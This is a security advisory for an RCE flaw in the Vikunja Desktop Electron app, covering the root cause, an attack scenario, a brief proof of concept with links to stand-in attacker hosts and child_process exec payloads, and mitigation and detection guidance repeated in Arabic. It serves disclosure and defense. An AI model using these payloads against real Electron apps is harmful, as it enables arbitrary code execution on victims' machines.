Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue.
## Root cause
Two misconfigurations combine to create this vulnerability:
1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.).
2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by:
- `<a href="https://...">` links (without `target="_blank"`)
- `window.location` assignments
- HTTP redirects
- `<meta http-equiv="refresh">` tags
## Attack scenario
1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).
2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `<a href="https://evil.example/exploit">Click here for the updated design spec</a>`
3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output.
4. The victim uses Vikunja Desktop and clicks the link.
5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process.
6. The attacker's page now executes in a context with `nodeIntegration: true` and runs: `require('child_process').exec('id > /tmp/pwned');`
7. Arbitrary commands execute as the victim's OS user.
## Impact
Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient.
## Proof of concept
1. Set up a Vikunja instance with two users sharing a project.
2. As the attacker user, edit a project description to include: `<a href="https://attacker.example/poc.html">Meeting notes</a>`
3. Host poc.html with: `<script>require('child_process').exec('calc.exe')</script>`
4. As the victim, open the project in Vikunja Desktop and click the link.
5. calc.exe (or any other command) executes on the victim's machine.
## Credits
This vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).
Vikunja Desktop (versions 0.21.0–2.1.x) contains a critical remote code execution vulnerability due to enabled Node.js integration without navigation restrictions. An attacker can embed malicious links in shared task descriptions or project details, and when clicked by a victim using Vikunja Desktop, arbitrary code executes with full system privileges. This affects all organizations using Vikunja Desktop for collaborative task management, particularly those with untrusted or semi-trusted users in shared projects.
Immediate Actions:
1. Disable or uninstall Vikunja Desktop on all endpoints until patching is complete. Use web-based Vikunja access only (web version is not affected).
2. Audit Vikunja project descriptions, task descriptions, and comments for suspicious links (especially those pointing to external domains or IP addresses).
3. Review system logs (Windows Event Viewer, macOS Console, Linux syslog) for unexpected process execution on machines where Vikunja Desktop was used.
4. Scan endpoints with EDR/antivirus for malware indicators and lateral movement artifacts.
Patching Guidance:
5. Upgrade Vikunja Desktop to version 2.2.0 or later immediately upon release.
6. If running Vikunja server, ensure it is also updated to the latest version (server-side sanitization is a defense-in-depth layer).
Compensating Controls (if patching is delayed):
7. Restrict Vikunja Desktop usage to trusted networks only; block external internet access from Vikunja Desktop processes via firewall rules.
8. Implement application whitelisting to prevent arbitrary code execution from Vikunja Desktop's renderer process.
9. Use endpoint detection and response (EDR) with behavioral monitoring to detect Node.js child_process execution from Electron processes.
10. Disable user-generated content rendering in project/task descriptions; use plain-text mode only.
Detection Rules:
- Monitor for Vikunja Desktop (Electron) spawning child processes (cmd.exe, powershell.exe, bash, sh).
- Alert on network connections from Vikunja Desktop to non-whitelisted external domains.
- Flag file system modifications in user home directories initiated by Vikunja Desktop.
- Detect `require('child_process')` or similar Node.js API calls in Electron renderer context.
الإجراءات الفورية:
1. تعطيل أو إلغاء تثبيت Vikunja Desktop على جميع الأجهزة حتى اكتمال التصحيح. استخدم الوصول المستند إلى الويب فقط (إصدار الويب غير متأثر).
2. تدقيق وصفات المشاريع والمهام والتعليقات في Vikunja بحثاً عن روابط مريبة (خاصة تلك التي تشير إلى نطاقات خارجية أو عناوين IP).
3. مراجعة سجلات النظام (Windows Event Viewer و macOS Console و Linux syslog) للبحث عن تنفيذ عمليات غير متوقعة على الأجهزة التي تم استخدام Vikunja Desktop عليها.
4. مسح الأجهزة باستخدام EDR/مكافحة الفيروسات للبحث عن مؤشرات البرامج الضارة وآثار الحركة الجانبية.
إرشادات التصحيح:
5. ترقية Vikunja Desktop إلى الإصدار 2.2.0 أو أحدث فوراً عند الإصدار.
6. إذا كان تشغيل خادم Vikunja، تأكد من تحديثه إلى أحدث إصدار (تعقيم جانب الخادم هو طبقة دفاع متعددة الطبقات).
الضوابط البديلة (إذا تأخر التصحيح):
7. تقييد استخدام Vikunja Desktop للشبكات الموثوقة فقط؛ حظر الوصول إلى الإنترنت الخارجي من عمليات Vikunja Desktop عبر قواعد جدار الحماية.
8. تنفيذ القائمة البيضاء للتطبيقات لمنع تنفيذ الأكواد العشوائية من عملية عرض Vikunja Desktop.
9. استخدام كشف الأجهزة والاستجابة (EDR) مع المراقبة السلوكية للكشف عن تنفيذ Node.js child_process من عمليات Electron.
10. تعطيل عرض محتوى ينشئه المستخدم في وصفات المشاريع/المهام؛ استخدم وضع النص العادي فقط.
قواعد الكشف:
- مراقبة Vikunja Desktop (Electron) لإنشاء عمليات فرعية (cmd.exe و powershell.exe و bash و sh).
- تنبيه الاتصالات الشبكية من Vikunja Desktop إلى نطاقات خارجية غير مدرجة في القائمة البيضاء.
- وضع علم على تعديلات نظام الملفات في دلائل المنزل التي بدأها Vikunja Desktop.
- الكشف عن `require('child_process')` أو استدعاءات Node.js API المماثلة في سياق عرض Electron.